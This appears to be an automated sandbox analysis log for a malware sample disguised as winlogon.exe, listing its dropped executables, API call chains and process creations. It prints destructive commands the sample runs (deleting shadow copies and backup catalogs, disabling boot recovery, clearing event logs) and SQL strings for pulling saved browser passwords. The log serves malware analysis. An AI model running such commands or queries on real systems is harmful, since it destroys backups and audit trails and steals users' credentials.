Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 3_2_00C61A30 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess, | 4_2_001416E9 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize, | 1_2_00D64C30 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource, | 1_2_00D6AAD0 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle, | 4_2_001412E8 |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Command line argument: <NULL> | 2_2_013338C0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Command line argument: <NULL> | 2_2_013338C0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Command line argument: <NULL> | 3_2_00C61EC0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Command line argument: <NULL> | 3_2_00C61EC0 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wbadmin.exe | 4_2_001416E9 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: bcdedit.exe | 4_2_001416E9 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wevtutil.exe | 4_2_001416E9 |
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini |
Source: C:\Users\user\Desktop\winlogon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R |
Source: yegus.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins; |
Source: yegus.exe | Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins; |
Source: yegus.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: yegus.exe | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: yegus.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: unknown | Process created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe' |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet |
Source: unknown | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet |
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe |
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding |
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System |
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security |
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security |
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0 |
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe unknown |
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 |
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B |
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security |
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 |
Source: winlogon.exe | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872 |
Source: yegus.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999364306084 |
Source: ucngw.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.995655293367 |
Source: _yig.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree, | 3_2_100147C0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess, | 3_2_10013CB0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb, | 3_2_100145E0 |
Source: C:\Windows\System32\wbadmin.exe | File created: C:\Windows\Logs\WindowsBackup |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7989E | 1_2_00D7989E |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D793F0 | 1_2_00D793F0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6F6CE | 1_2_00D6F6CE |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7CF3F | 1_2_00D7CF3F |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61110 | 1_2_00D61110 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D69330 | 1_2_00D69330 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61870 | 1_2_00D61870 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D68EE0 | 1_2_00D68EE0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01331370 | 2_2_01331370 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_0133E8FF | 2_2_0133E8FF |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013315E0 | 2_2_013315E0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013310A0 | 2_2_013310A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01332B70 | 2_2_01332B70 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013332D0 | 2_2_013332D0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10064140 | 2_2_10064140 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100196A0 | 2_2_100196A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10029130 | 2_2_10029130 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003C880 | 2_2_1003C880 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10053C80 | 2_2_10053C80 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10065870 | 2_2_10065870 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100804F0 | 2_2_100804F0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10027050 | 2_2_10027050 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10006022 | 2_2_10006022 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10007870 | 2_2_10007870 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10005C30 | 2_2_10005C30 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1006F810 | 2_2_1006F810 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10036CD0 | 2_2_10036CD0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003B6A0 | 2_2_1003B6A0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10008D50 | 2_2_10008D50 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10079459 | 2_2_10079459 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10022AD0 | 2_2_10022AD0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10078060 | 2_2_10078060 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10017050 | 2_2_10017050 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10002200 | 2_2_10002200 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1002DD28 | 2_2_1002DD28 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10074780 | 2_2_10074780 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10021F80 | 2_2_10021F80 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001EBB0 | 2_2_1001EBB0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001CFF0 | 2_2_1001CFF0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008DE01 | 2_2_1008DE01 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100722E0 | 2_2_100722E0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FC90 | 3_2_00C5FC90 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C60F40 | 3_2_00C60F40 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5D39F | 3_2_00C5D39F |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FD20 | 3_2_00C5FD20 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61150 | 3_2_00C61150 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F3F0 | 3_2_00C5F3F0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F6A0 | 3_2_00C5F6A0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10004950 | 3_2_10004950 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100039B3 | 3_2_100039B3 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000F898 | 3_2_1000F898 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10003C10 | 3_2_10003C10 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000B61E | 3_2_1000B61E |
Source: C:\Users\user\Desktop\winlogon.exe | Process token adjusted: Security |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: String function: 00D6B650 appears 34 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 100071E0 appears 59 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10024C30 appears 105 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10007480 appears 193 times | |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10008070 appears 167 times | |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: String function: 00C51CA0 appears 32 times | |
Source: _wjg.exe.1.dr | Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe |
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\winlogon.exe |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection, | 1_2_00D63920 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle, | 1_2_00D65DD0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle, | 1_2_00D65DD0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B598 SetUnhandledExceptionFilter, | 1_2_00D6B598 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 1_2_00D6AE70 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D6B406 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D7009F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013347F1 SetUnhandledExceptionFilter, | 2_2_013347F1 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_013346A3 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 2_2_013340FB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_013372DB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 2_2_100827CB |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_1008657C |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_10083265 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51BE9 SetUnhandledExceptionFilter, | 3_2_00C51BE9 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00C54CBD |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_00C514CB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00C51A54 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_10001795 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_1000662D |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_10001B37 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 4_2_001417EA |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 4_2_0014333B |
Source: C:\Users\user\Desktop\winlogon.exe | System information queried: KernelDebuggerInformation |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_00D6B406 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath, | 1_2_00D643A0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h] | 1_2_00D70D28 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h] | 2_2_01337F59 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10085756 mov eax, dword ptr fs:[00000030h] | 2_2_10085756 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h] | 3_2_00C558EB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100051BB mov eax, dword ptr fs:[00000030h] | 3_2_100051BB |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process token adjusted: Debug |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW, | 1_2_00D75F8F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW, | 2_2_01339A82 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA, | 2_2_10088620 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW, | 3_2_00C5850A |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA, | 3_2_10008EEC |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose, | 4_2_00141441 |
Source: wbadmin.exe | Binary or memory string: Cluster service, and Hyper-V for more information. |
Source: wbadmin.exe | Binary or memory string: An error occurred while preparing to back up Hyper-V data. |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | API call chain: ExitProcess graph end node |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process information queried: ProcessInformation |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle, | 4_2_001412E8 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Thread delayed: delay time: 3600000 |
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe |
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes |
Source: C:\Users\user\Desktop\winlogon.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-13588 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes |
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392 | Thread sleep time: -60000s >= -60000s |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268 | Thread sleep time: -120000s >= -60000s |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300 | Thread sleep time: -3600000s >= -60000s |
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -120000s >= -60000s |
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -60000s >= -60000s |
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep count: 89 > 30 |
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep time: -5340000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep count: 57 > 30 |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -3420000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -60000s >= -60000s |
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep count: 81 > 30 |
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep time: -4860000s >= -60000s |
Source: C:\Windows\System32\vdsldr.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
